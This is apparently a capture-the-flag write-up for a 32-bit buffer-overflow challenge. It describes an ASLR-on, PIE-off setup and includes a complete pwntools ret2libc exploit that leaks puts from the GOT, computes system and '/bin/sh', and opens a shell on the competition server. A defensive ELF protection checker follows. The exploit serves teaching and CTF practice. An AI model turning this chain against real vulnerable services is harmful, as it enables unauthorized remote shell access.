My friend keeps talking about Old School RuneScape. He says he made a service to tell you about trees.
I don’t know what any of this means but this system sure looks old! It has like zero security features enabled…
At first, you might think that this is a simple buffer overflow where you write shellcode onto the stack and return to it, since the description says they have zero security features enabled. But ASLR is enabled, so that won't work. We know it won't work because if you give an invalid tree name, you get a pointer back, and you can see that it changes on every run.
Since PIE is disabled, we can just do a ROP chain into libc (ret2libc). This technique is explained in this post, so I won't write about it here: https://elnath.io/2020/05/30/stop/
```python
from pwn import *

context.update(arch='i386', os='linux')

is_local = False
write_file = True

if is_local:
    p = process("./osrs")
    libc = ELF("/usr/lib32/libc-2.30.so")
else:
    p = remote("p1.tjctf.org", 8006)
    libc = ELF("./libc-2.27.so")  # https://libc.blukat.me/?q=puts%3A0xf7e5e360

elf = ELF("./osrs")
rop = ROP(elf)

# Binary is not PIE, so these addresses are fixed.
GOT_PUTS = elf.got["puts"]
PRINTF = elf.plt["puts"]
GET_TREE = elf.sym["get_tree"]
RET = rop.find_gadget(['ret'])

# Bytes rather than str so the script runs under Python 3 as well.
JUNK = b'A' * 272
JUNK_ADDR = b'B' * 4

### First ROP ###
# Call puts(GOT[puts]) and return into get_tree for a second overflow.
p.recvline()
p.sendline(JUNK + p32(PRINTF) + p32(GET_TREE) + p32(GOT_PUTS))
p.recvline()
LEAK_PUTS = p.recvline()
PUTS = u32(LEAK_PUTS[0:4])
print("LEAKED PUTS:" + hex(PUTS))

### Second ROP ###
# Offsets inside libc are constant, so the leak fixes the other addresses.
offset_puts = libc.sym['puts']
offset_system = libc.sym['system']
offset_binsh = next(libc.search(b"/bin/sh"))

SYSTEM = PUTS - (offset_puts - offset_system)
BINSH = PUTS + (offset_binsh - offset_puts)

p.sendline(JUNK + p32(SYSTEM) + JUNK_ADDR + p32(BINSH))
p.recvline()
p.interactive()
```
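The "zero security features" claim in the description is exactly the kind of thing to verify rather than trust, and the mismatch above (ASLR on, PIE off) is why. As an added example that is not part of the writeup, here is the core of what `checksec` does, in plain Python: read the ELF32 header and program headers and report PIE, NX and RELRO. ASLR itself is a kernel setting, not a property of the file, and the sample ELF bytes below are constructed here only to exercise the parser.

```python
import struct

ET_EXEC, ET_DYN = 2, 3          # e_type: fixed-address executable vs. PIE/shared object
PT_GNU_STACK = 0x6474E551       # program header carrying the stack's permission bits
PT_GNU_RELRO = 0x6474E552       # program header marking the region made read-only after relocation
PF_X = 0x1                      # segment flag: executable

def elf32_protections(data):
    """Report PIE / NX / RELRO for a little-endian ELF32 image given as bytes."""
    if data[:4] != b"\x7fELF" or data[4] != 1:
        raise ValueError("not a 32-bit ELF image")
    hdr = struct.unpack_from("<16sHHIIIIIHHHHHH", data, 0)
    e_type, e_phoff, e_phentsize, e_phnum = hdr[1], hdr[5], hdr[9], hdr[10]
    # Without a PT_GNU_STACK header the loader falls back to an executable stack,
    # so NX is only True when the header exists and lacks PF_X.
    nx, relro = False, False
    for i in range(e_phnum):
        ph = struct.unpack_from("<8I", data, e_phoff + i * e_phentsize)
        p_type, p_flags = ph[0], ph[6]
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = True
    return {"pie": e_type == ET_DYN, "nx": nx, "relro": relro}

def build_sample_elf32(pie, nx, relro):
    """Constructed, non-loadable ELF32 skeleton (headers only) used to exercise the parser."""
    stack_flags = 0x6 | (0 if nx else PF_X)           # RW, plus X for an executable stack
    phdrs = [struct.pack("<8I", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 16)]
    if relro:
        phdrs.append(struct.pack("<8I", PT_GNU_RELRO, 0, 0, 0, 0, 0, 0x4, 1))
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8  # ELFCLASS32, little-endian
    hdr = struct.pack("<16sHHIIIIIHHHHHH", ident, ET_DYN if pie else ET_EXEC,
                      3, 1, 0, 52, 0, 0, 52, 32, len(phdrs), 40, 0, 0)
    return hdr + b"".join(phdrs)

if __name__ == "__main__":
    # The shape the challenge text advertises: non-PIE, executable stack, no RELRO.
    print(elf32_protections(build_sample_elf32(pie=False, nx=False, relro=False)))
```

Run it against a real file with `elf32_protections(open("./osrs", "rb").read())`; stack canaries are not covered here because detecting them needs the symbol table, not just the headers.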